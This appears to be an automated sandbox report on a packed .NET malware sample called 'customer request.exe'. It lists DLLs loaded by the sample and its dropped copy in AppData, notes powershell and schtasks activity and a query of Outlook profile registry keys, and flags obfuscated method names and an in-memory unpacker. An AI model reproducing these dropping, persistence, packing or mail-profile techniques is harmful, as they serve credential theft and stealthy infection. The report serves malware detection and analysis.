Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\customer request.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\customer request.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\customer request.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: customer request.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: customer request.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.customer request.exe.7dc0000.6.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, s7tEnZsGU0CiWE4q63.cs	.Net Code: a8GHSaTcYX System.Reflection.Assembly.Load(byte[])
Source: 0.2.customer request.exe.4258630.3.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, s7tEnZsGU0CiWE4q63.cs	.Net Code: a8GHSaTcYX System.Reflection.Assembly.Load(byte[])
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, s7tEnZsGU0CiWE4q63.cs	.Net Code: a8GHSaTcYX System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A3E540 push 8C02F6D1h; iretd	0_2_07A3E545
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_07A3E0A8 pushad ; retf	0_2_07A3E0A9
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_092A99E0 push esp; ret	0_2_092A99E1
Source: C:\Users\user\Desktop\customer request.exe	Code function: 0_2_092AA868 push esp; retf	0_2_092AA869
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F2840 push esp; retf	8_2_056F2AC9
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_056F2E78 push esp; iretd	8_2_056F2E79
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695F0B2 push es; ret	8_2_0695F0B8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 10_2_08EEA868 push esp; retf	10_2_08EEA869
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 10_2_08EE99E0 push esp; ret	10_2_08EE99E1
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_05252990 pushad ; retf	13_2_05252AC9
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_05252E78 pushad ; iretd	13_2_05252E79
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696F0B2 push es; ret	13_2_0696F0B8

Source: customer request.exe	Static PE information: section name: .text entropy: 7.694650070350198
Source: tjvxuavKFXO.exe.0.dr	Static PE information: section name: .text entropy: 7.694650070350198

Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, Ptwf96BE9v7EsISXRu.cs	High entropy of concatenated method names: 'DT5w2QTUt2', 'vmQwYY2fJM', 'Fn1wwYGkrp', 'WfmwMhVhRF', 'aggwy1A4JT', 'dkOwFK0eO3', 'Dispose', 'gbT4glsV2m', 'iQn4ct3qCB', 'ObV46D4KMW'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, gkL6jmNysptghdYcpQ.cs	High entropy of concatenated method names: 'WT70JO8d87', 'OeM0uNrdU4', 'n0O0v1kQWM', 'fNV0ZjLlQu', 'P9V07KIiLP', 'Ix90mRKsqL', 'CRv0bVT2Ya', 'meg0kopdKR', 'vIy0Q2emXi', 'hiH01IZE5v'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, efgmRCKKu8Y2Q97foO.cs	High entropy of concatenated method names: 'lsWwv5l76I', 'OHCwZouhQj', 'OtDwfNLBMB', 'lrew77UQ3i', 'YhcwmigoqM', 'wyKwRnaenT', 'K7twbqfLfd', 'A2VwkAEIoC', 'NiGwe8Sy3g', 'lFXwQ3mQ3d'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, AGdSZhHM1AGYJCpOk9.cs	High entropy of concatenated method names: 'b3H5WxaQCH', 'pgI5sNh8Um', 'F3e53BbehX', 'Jf95PxeXfK', 'h3U52Vqh8Y', 'g6S5LJOkgC', 'd5RL95mYMnjjuBe4Rj', 'cckOkJPoExnUEyB30h', 'J8Y55u7Hl4', 'JDU5Vk6F0P'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, MXfKbGljepPOW63UVq.cs	High entropy of concatenated method names: 'Dl8Tol0IJ8', 'j4LTGm2bkw', 'yMU6fVLAfv', 'EJs67tShQs', 'bnA6mZUVNP', 'z4u6RyNidB', 'zs26bahn8k', 'Wfq6kFvfCK', 'h3Q6erch1b', 'JUQ6QolMBm'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, hMaaplu3eBbehXmf9x.cs	High entropy of concatenated method names: 'r8O6hxoxip', 'AO16EVv3QZ', 'LrM6Ji9VuS', 'tx16uxOsJq', 'XlF62Cj3oO', 'KMp6LykNBx', 'u8C6YMSvTL', 'MRX64HioBa', 'HTE6wIg0yy', 'oi26nuUIf7'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, pwqggszUXKQrHygH4t.cs	High entropy of concatenated method names: 'LS5nEoOcHd', 'c9AnJeSxNb', 'vGknu7p0mF', 'a1Wnvdl27U', 'TJRnZwrCDN', 'CX2n7smJ5i', 'TnhnmsG4kq', 'URxnFx4CJT', 'a8onCsgY8b', 'MI4ntd4iaE'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, exaQCHJYgINh8UmdbN.cs	High entropy of concatenated method names: 'M2ecI2gMWG', 'clgcimHOZI', 'BsAcxn0vOE', 'TZjcdwQ6xN', 'F9EcX0jiOv', 'I6wcqDe6TS', 'uGjcBq5eQU', 'L5kc8HnPgG', 'Bc6cKT2mmN', 't44c9TLQh1'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, BdwHJypWnaQtGhd35f.cs	High entropy of concatenated method names: 'RZ6Sr8aGS', 'sbghegMGF', 'KyKEpC6Vf', 'G4sG4lqAV', 'jcHurZWjO', 'QBYlnX5OH', 'lNqbd5M8oNICu2qGva', 'npHieFCnSlimZ5OPIt', 'iJo4MQHV4', 'R9PnygSTr'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, YIi2h6cHyIdwL6sDQo.cs	High entropy of concatenated method names: 'Dispose', 'G7E5KsISXR', 'r7gpZlv6aB', 'Wx7qtMyhU7', 'E6s59YTDan', 'qVN5zrr6dW', 'ProcessDialogKey', 'fuOpafgmRC', 'Xu8p5Y2Q97', 'HoOppW67m4'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, Ec2XMFxfaiHxkRmBmn.cs	High entropy of concatenated method names: 'ToString', 'ImDL1ii5T7', 'oSnLZKBFoP', 'TowLfaS0KN', 'SbUL7J1iTb', 'A16LmWC0kF', 'pc6LRqxr5s', 'qigLbkt3yk', 'ysrLkRxWfo', 'YsgLeIwmhq'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, Tnqhso5aBiL7pIZ1D2n.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DRTn1VhWP5', 'KVUnDADir4', 'A9knNXpfBu', 'Vh2nId0mKA', 'PXjnig733N', 'LnDnxmaS3K', 'J2qndT6EGQ'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, A8Yc6SvJOkgCLfdkMW.cs	High entropy of concatenated method names: 'ptLjOVwp1e', 'nCijcBdNTj', 'li7jT7hraB', 'ErojWOb2g9', 'ACyjsV5dpp', 'XhFTX2MRJM', 'NpQTq07fil', 'PoCTB67wwt', 'QfFT8EZ84m', 'CrPTKjNyGb'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, s7tEnZsGU0CiWE4q63.cs	High entropy of concatenated method names: 'oe9VOO3FZP', 'M6lVgmVuKV', 'Rh9Vc16JqN', 'rITV6tGqBN', 'TyrVT9rcB0', 'awuVjZgmQj', 'uXQVWtAc5t', 'Xw2VssPjMs', 'ubZVrNQcsr', 'LLHV35UkIq'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, j67m479qTcYDg5Qguq.cs	High entropy of concatenated method names: 'rWRn67XBtS', 'uHSnTDBg29', 'G0Bnj4jEbH', 'hchnWfXOci', 'JGJnwOykBq', 'zaLnsA5xwV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, mp4sV1dn69wNfhIg3N.cs	High entropy of concatenated method names: 'NRYY3kRiS8', 'AdUYPsDHYP', 'ToString', 'T7iYgihKCL', 'IWrYcvwejs', 'mXXY6wP20F', 'vPDYTHRJ8D', 'AFUYjB6s1p', 'MNsYWKoAo3', 'K9HYsHrlQe'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, UpvgWE5pceq8dtfURFr.cs	High entropy of concatenated method names: 'ToString', 'p4CMJKiTqA', 'n1lMuDJFU7', 'VEsMlJTO7b', 'OxQMvc1Ubp', 'EqRMZt81IB', 'VrTMflldGA', 'h9sM7h72F5', 'eJBNabYn6yMXT5csZeZ', 'VIJoXiYLw5bWIi32E7T'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, ggYHRHqDX7wH0p7mYb.cs	High entropy of concatenated method names: 'J73Y8PFY2T', 'TLrY9ivX8Y', 'Kvo4aMBHjv', 'HTK45ilxZh', 'NGTY1fSZZ3', 'nZbYDpQGqk', 'OqoYNRT7Pl', 'wpAYIQtmGM', 'x8BYi5Ms0i', 'zXsYxaqTxj'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, TfOtqUbyxqV9FU2AH5.cs	High entropy of concatenated method names: 'eIDWgaj1M6', 's77W6XeIoS', 'eIpWjjRaZ2', 'acXj9hQliE', 'Lqfjz0WZ6s', 'MaSWaBNtRg', 'K71W5E7v3d', 'HGOWpjuXas', 'XEvWVeRDEu', 'mZKWH2cUUf'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, IcyCVre0gh9TpvYKf1.cs	High entropy of concatenated method names: 'MNeWCSbEEL', 'NK2Wtklbot', 'etZWSBf0h0', 'dkcWhCRXrC', 'ShJWooJn1n', 'mXdWEDVOF5', 'grFWGfVeWZ', 'YIvWJBJGeI', 'VVCWua1HIn', 'i09WlonLll'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, qMAX89556eugk2HNcXE.cs	High entropy of concatenated method names: 'oMan9LWHj3', 'Gk5nzkplLX', 'fLVMa6cV2R', 'pdnM5CbMGg', 'ObmMpocVdS', 'oMGMV7YRp8', 'zMOMHyrDQW', 'TyJMOeA9nh', 'Y5jMgY0R5G', 'WoqMc9VnIC'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, YE2KE66fLmJbymeiDC.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'z5fpKX4veK', 'JFHp9GXqxf', 'RnQpzq6MxA', 'faLVarnmO4', 'HgMV5EIeH7', 'OVeVprlu1X', 'R3wVV1hNnT', 'KyjmATyjVy5AIUHxCJe'
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, MVyPJH5HJaOE2TxbUjq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NbqUwGSeEr', 'KNMUnq22sQ', 'uJoUMp0nDw', 'rhsUU1CKAj', 'llYUym3vpO', 'DIbUAq9Mdl', 'KClUFsDPiE'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, Ptwf96BE9v7EsISXRu.cs	High entropy of concatenated method names: 'DT5w2QTUt2', 'vmQwYY2fJM', 'Fn1wwYGkrp', 'WfmwMhVhRF', 'aggwy1A4JT', 'dkOwFK0eO3', 'Dispose', 'gbT4glsV2m', 'iQn4ct3qCB', 'ObV46D4KMW'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, gkL6jmNysptghdYcpQ.cs	High entropy of concatenated method names: 'WT70JO8d87', 'OeM0uNrdU4', 'n0O0v1kQWM', 'fNV0ZjLlQu', 'P9V07KIiLP', 'Ix90mRKsqL', 'CRv0bVT2Ya', 'meg0kopdKR', 'vIy0Q2emXi', 'hiH01IZE5v'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, efgmRCKKu8Y2Q97foO.cs	High entropy of concatenated method names: 'lsWwv5l76I', 'OHCwZouhQj', 'OtDwfNLBMB', 'lrew77UQ3i', 'YhcwmigoqM', 'wyKwRnaenT', 'K7twbqfLfd', 'A2VwkAEIoC', 'NiGwe8Sy3g', 'lFXwQ3mQ3d'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, AGdSZhHM1AGYJCpOk9.cs	High entropy of concatenated method names: 'b3H5WxaQCH', 'pgI5sNh8Um', 'F3e53BbehX', 'Jf95PxeXfK', 'h3U52Vqh8Y', 'g6S5LJOkgC', 'd5RL95mYMnjjuBe4Rj', 'cckOkJPoExnUEyB30h', 'J8Y55u7Hl4', 'JDU5Vk6F0P'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, MXfKbGljepPOW63UVq.cs	High entropy of concatenated method names: 'Dl8Tol0IJ8', 'j4LTGm2bkw', 'yMU6fVLAfv', 'EJs67tShQs', 'bnA6mZUVNP', 'z4u6RyNidB', 'zs26bahn8k', 'Wfq6kFvfCK', 'h3Q6erch1b', 'JUQ6QolMBm'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, hMaaplu3eBbehXmf9x.cs	High entropy of concatenated method names: 'r8O6hxoxip', 'AO16EVv3QZ', 'LrM6Ji9VuS', 'tx16uxOsJq', 'XlF62Cj3oO', 'KMp6LykNBx', 'u8C6YMSvTL', 'MRX64HioBa', 'HTE6wIg0yy', 'oi26nuUIf7'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, pwqggszUXKQrHygH4t.cs	High entropy of concatenated method names: 'LS5nEoOcHd', 'c9AnJeSxNb', 'vGknu7p0mF', 'a1Wnvdl27U', 'TJRnZwrCDN', 'CX2n7smJ5i', 'TnhnmsG4kq', 'URxnFx4CJT', 'a8onCsgY8b', 'MI4ntd4iaE'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, exaQCHJYgINh8UmdbN.cs	High entropy of concatenated method names: 'M2ecI2gMWG', 'clgcimHOZI', 'BsAcxn0vOE', 'TZjcdwQ6xN', 'F9EcX0jiOv', 'I6wcqDe6TS', 'uGjcBq5eQU', 'L5kc8HnPgG', 'Bc6cKT2mmN', 't44c9TLQh1'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, BdwHJypWnaQtGhd35f.cs	High entropy of concatenated method names: 'RZ6Sr8aGS', 'sbghegMGF', 'KyKEpC6Vf', 'G4sG4lqAV', 'jcHurZWjO', 'QBYlnX5OH', 'lNqbd5M8oNICu2qGva', 'npHieFCnSlimZ5OPIt', 'iJo4MQHV4', 'R9PnygSTr'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, YIi2h6cHyIdwL6sDQo.cs	High entropy of concatenated method names: 'Dispose', 'G7E5KsISXR', 'r7gpZlv6aB', 'Wx7qtMyhU7', 'E6s59YTDan', 'qVN5zrr6dW', 'ProcessDialogKey', 'fuOpafgmRC', 'Xu8p5Y2Q97', 'HoOppW67m4'
